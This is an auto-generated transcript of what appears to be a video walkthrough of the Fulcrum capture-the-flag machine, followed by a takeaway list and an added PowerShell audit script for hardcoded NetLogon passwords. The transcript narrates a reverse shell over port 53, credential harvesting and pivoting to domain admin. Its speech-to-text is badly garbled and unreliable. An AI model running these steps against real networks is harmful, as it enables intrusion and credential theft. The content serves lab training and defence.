computer name 10 10 1430 - port test all the ports and I screwed that up I need to do that first - port I should be running this in the script block my bad so we can copy this and then let's do the script block so invoke command computer file focal local credential tread script block any double and then let's open up wireshark so we can see if anything talks back to us so ton 0 up we want IP dot port I know IP dot address is equal to 10 then foot 10 10 10 62 okay see that commands correct we got a lot of ssh so we'll do and not TCP port equals 22 which is probably going to make it so we can't see if the server actually reach back on SSH so that very first point we're checking it's kind of a moot thing because yeah we just filtered that out so let this run and we'll see if we get anything back we see that we got TCP port 53 back so we can talk to our but local box over DNS so let's go here and let's see V and VOC one line and we'll change this to be port 53 we'll call this one file clothes out of that we got to do the shell again so let's copy and copy this and then we need one last one and the boat command copy up to script block okay then we want to paste a shell on port 53 CL v NP 53 paste all right had a frickin character at the end thankfully when I'm doing dye paste go to file we get a connection back to hostname and we're on the file server as be tables so let's look at what there is nothing in directory do dir we get a bunch of files and I don't think these were supposed to be here but they're from October 2017 so yeah I guess they got left in so we'll play with them the intended way I think is to look at net login so if you did like a net use what is it d c-- dot fulcrum dot local I need Z coal or something DC fulcrum dot local slash net logon and then I think it slash user say : fulcrum was it be tables and then file server while go on one two three four five I think that's it then error if we do z : did it map it either let's try that again that type net 
user and seven that use I did not use let's see where was my mistake let's just try using back slashes I want to copy the past because it's a bit pain I think copy all of this let's put the DC and back slashes maybe that's it do not use that use the : DC fulcrum local net wall gone then paste all this there we go I had to be in backslashes if you look at the net wall gone which is readable by domain users in Active Directory because that's how good policy works you get a bunch of PowerShell scripts and these PowerShell scripts or a bunch of credentials user and pass so let us find the one that has let's see what was that account name we want nine two three a because that is one that has logged in so let's take a look for that file so let's do get showered item - we five just dooster ps1 then select string set nine to three a select object unique path is that go and do it it's taken off a long time overweight and just do something stupid powershell you can do something stupid quite easily should take that long let's see we're good - should be here so if we do P W SH should be able to run that on my Kelly blocks it did not work go back cherry tree 9 2 3 a I didn't do the telemetry we'll just be quick get child item which I curse start ps1 select string 93 a rect object unique nope that's not gonna work so let's see let's go google PowerShell flying file that contains straight find string in all files try this oh it found something ones that just broken on Linux let's see what this file is tight 9 2 3 a is in the password that's cute let's try this one 93 a so let's try this let's see let's save this and we'll exit this shell and then tried the main controller let's see copy say that fulcrum 9 to 3 a good exit based on port 53 again go to web and let us slightly change this so we want to copy command for everything up to DC and then see if we can run code on the domain controller this is 1 1 DC there we go paste did not like something missing closing command - 
computer DC fulcrum got local cadential cred script block and we'll just paste it again the gap dub dub dub cat this one-liner make sure we don't get that end of line character listening paste let's see I don't know where it now says unexpected see this is the one that worked before and that's not working anymore them tap let's see what this looks like that should be good copy all this paste cred I got that in the command computer d c-- dot fulcrum dot local - credential cred script block Who am I air it out so let's type this all again and I think I just realized the mistake I wasn't doing this as nine to three a sec pass convert to secure string the password is something I forgot to do this piece it just wasn't a good error message to tell me it was an authentication failure least that's what I'm gonna go with and this is gonna work cred new object system automation credential nine to three a okay now we can invoke Tran computer DC fulcrum local potential curd script walk Who am I does not like that let's see I bet it is PS exec that's why PS exec is here let's see so you need documents let's do test Net connection on how do we do this - computer name 10:10 now DC fulcrum local - port 5 9 8 6 doesn't look like I can get to that port so we definitely can't do this windows remoting thing again so let us just try a net use so DC fulcrum local / ñè doing that log on that's fine well we could by just do see dollar sign because this user should be a domain admin from the domain users output slash user full chrome 9 2 3 a and then the password and I forgot to specify a drive letter well we can't mount it anyways so the issue is shoot this web server can't reach the domain controller on specific ports so we got to go back in to the file server and it's a bit of a pain because I think only DNS can get out so what if we can chain invoke commands so let's see we have to do two passwords so cred is an a.1 right now so let's do sec pass is equal to convert to secure string 
and this has to be the file server be tables plain text force now we can do that is equal to new object nation good natural fulcrum be tables actually fine set pass cred good let's do B tables sequel to cred and let's test this invoke command computer name file dot local - credential B tables Oh am i so right now I'm just testing that these credentials are correct and I can log in there and now we got to do the same thing but for 9 to 3 a so his password was this as plain text force I need the dollar sign there we go 9 to 3 a and we'll do this as da okay so we've got the credentials set away let us start typing this in bash so we definitely need this so let's see we want to do invoke command compute a name file dot C fulcrum dot local and we want to do - credentials beep tables and script lock is equal to in the command as computer name d c-- dot fulcrum local - credentials da - script walk there's no way this is going to work paste exit that exit that before we do this just want to do one last thing what is it invoke command test ok and I'm testing if it's going to process that variable on the web server or the file server it looks like it's going to process it on the file server so wonder if I escaped it and that just crashed let's see I can just put these in this bash script let's see I should prepare for this video a bit more at this point I think I had used Metasploit when the box came out so let's see for three its cred is the second thing we need we call it da so don't have to edit the show I said we can call it da and yet I typed read da maybe I'm extremely lucky that'll work and I don't think I'm extremely lucky right now I don't know I'm copying it I need to do this but with the B tables password I think my best move was putting stuff in cherry tree so I can quickly refer to it this is why I had done that okay so now we should be able to invert command again on the file server by old dot local credential cred I think I've credentials in my bash I should 
remember to change that script block Who am I cursed name should do two commands okay that is good five yes I do have credentials here comes the moment of truth is that going to work it is not let's see what it error credentials I typed it twice and this is now just credit I think and we crashed win RM let's see I'm gonna think about this a little bit to see now we can do this double hop I'm gonna clean this up because this is unreadable so let's see if I made a mistake there unscrew I guess paste and let's see get the credential I see an error already try to do too much at once okay so this is what it looks like and real command file fulcrum local good angles cred that looks good SEC pass is equal to convert to secure string that looks good tha


Key Takeaways
  1. Use XML external entity attack to gain shell
  2. Detect XXE vulnerability using Burp Suite
  3. Exploit RFI vulnerability to inject PHP code
  4. Use PowerShell remoting to the external interface
  5. Create a transform file to read files off the server
  6. Use HTTP requests to send data in the URL for blind XXE exploitation
  7. Create a directory and an XML file to store the transform data
  8. Use Base64 encoding to encode and decode data
  9. Send HTTP response with 200 status code
💡 The key to this hack is the combination of XML external entity attacks and Server Side Request Forgery to gain code execution and ultimately a shell.

Chapters (17)

2:08 Begin of Recon
14:00 XXE Detection on Fulcrum API
17:40 XXE Get Files
23:40 XXE File Retrieval Working
24:30 Lets Code a Python WebServer to Aid in XXE Exploitation
39:45 Combining XXE + SSRF (Server Side Request Forgery) to gain Code Execution
47:28 Shell Returned + Go Over LinEnum
56:49 Finding WebUser's Password and using WinRM to pivot
1:06:00 Getting Shell via WinRM, finding LDAP Credentials
1:14:00 Using PowerView to Enumerate AD Users
1:27:06 Start of getting a Shell on FILE (TroubleShooting FW)
1:35:35 Getting shell over TCP/53 on FILE
1:37:58 Finding credentials on scripts in Active Directories NetLogon Share, then find
1:58:10 Troubleshooting the error correctly and getting Domain Admin!
2:03:54 Begin of unintended method (Rooting the initial Linux Hop)
2:09:54 Root Exploit Found
2:12:25 Mounting the VMDK Files and accessing AD.
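The 1:37:58 chapter turns on logon scripts in the NetLogon share carrying plaintext usernames and passwords, a share every domain user can read by design. The following is an added defender-side audit script (not from the video or from IppSec) that sweeps such a share for that pattern and reports the locations with the secret redacted; the share path, file types and regexes are assumptions to adapt to your own domain.

```powershell
# Added audit example (not from the video). Assumption: the share path, file types and
# patterns below are illustrative; adjust them for your domain.
param(
    [string]$Share = '\\dc.fulcrum.local\NetLogon',      # domain name as used in the video
    [string[]]$Include = @('*.ps1', '*.bat', '*.cmd', '*.vbs')
)

# Regexes that usually mean a secret is embedded in a logon script (assumption).
$Patterns = @(
    '(?i)\$?pass(word)?\s*=\s*["'']?[^\s"'']{6,}',     # $password = "...", pass=...
    '(?i)/user:\S+\s+\S+',                            # net use ... /user:DOM\name pw
    '(?i)ConvertTo-SecureString\s+["'']',             # inline plaintext -> SecureString
    '(?i)PSCredential\s*\(\s*["'']'                   # PSCredential("user", ...)
)

function Find-HardcodedCredential {
    param([string]$Path, [string[]]$Filter, [string[]]$Regex)

    # Walk the share, match every line against all patterns, and emit one record per hit.
    Get-ChildItem -Path $Path -Recurse -Include $Filter -File -ErrorAction SilentlyContinue |
        Select-String -Pattern $Regex |
        ForEach-Object {
            [pscustomobject]@{
                Path    = $_.Path
                Line    = $_.LineNumber
                Pattern = $_.Pattern
                # Keep only the first three characters of the last token so the report
                # itself does not carry the secret it found.
                Context = ($_.Line.Trim() -replace '(\S{3})\S*$', '$1***')
            }
        }
}

$Findings = Find-HardcodedCredential -Path $Share -Filter $Include -Regex $Patterns
$Findings | Sort-Object Path, Line | Format-Table -AutoSize

# Every account named in these scripts should be treated as exposed to all domain users:
# rotate it and move the secret out of the script (gMSA, Group Policy Preferences
# without cpassword, or a vault) rather than just deleting the line.
```

Run it as an ordinary domain user on purpose: if the audit account can read the secret, so could the low-privilege account the video pivots from.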